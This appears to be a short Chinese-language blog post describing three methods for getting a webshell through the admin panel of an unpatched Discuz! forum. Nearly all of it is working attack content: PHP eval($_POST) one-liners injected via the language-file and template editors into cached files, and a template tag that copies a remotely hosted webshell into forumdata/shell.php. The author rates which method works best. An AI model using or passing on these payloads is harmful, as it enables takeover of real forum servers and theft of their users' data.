discuz后台拿shell几种方法:前提是discuz没打补丁
==========================================
(1)
discuz 6.x 此方法需要创始人账号:
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:
1.后台编辑
customfaq(customfaq.lang.php文件)
在eval($_POST[c]);
2.后台编辑
misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
";eval($_POST[c]);"
在
前台回帖处选择引用回复。
==========================================
(2)discuz
7.0以下版本 此方法需要管理员权限账号:
以管理员身份进后台之后访问/admincp.php?action=styles&operation=edit&id=1&adv=1
然
后新增模板变量,变量的地方填XXX', '#999');eval($_POST[cmd]);//
替换内容随便输入:xxxx,然后提交,一
句话木马就产生了:
/forumdata/cache/style_1.php 这个1和模板id对应,模板id是几就是几
这个一句话密
码是大写的CMD #beach注:此方法最好用
==========================================
(3)
目前通吃所有discuz版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为
3.
在任意位置输入:
{eval copy('',
DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6.
把模板恢复原样
大功告成, 访问/forumdata/shell.php便是马。#beach注:此方法我没用过
阅读(5884) | 评论(0) | 转发(0) |
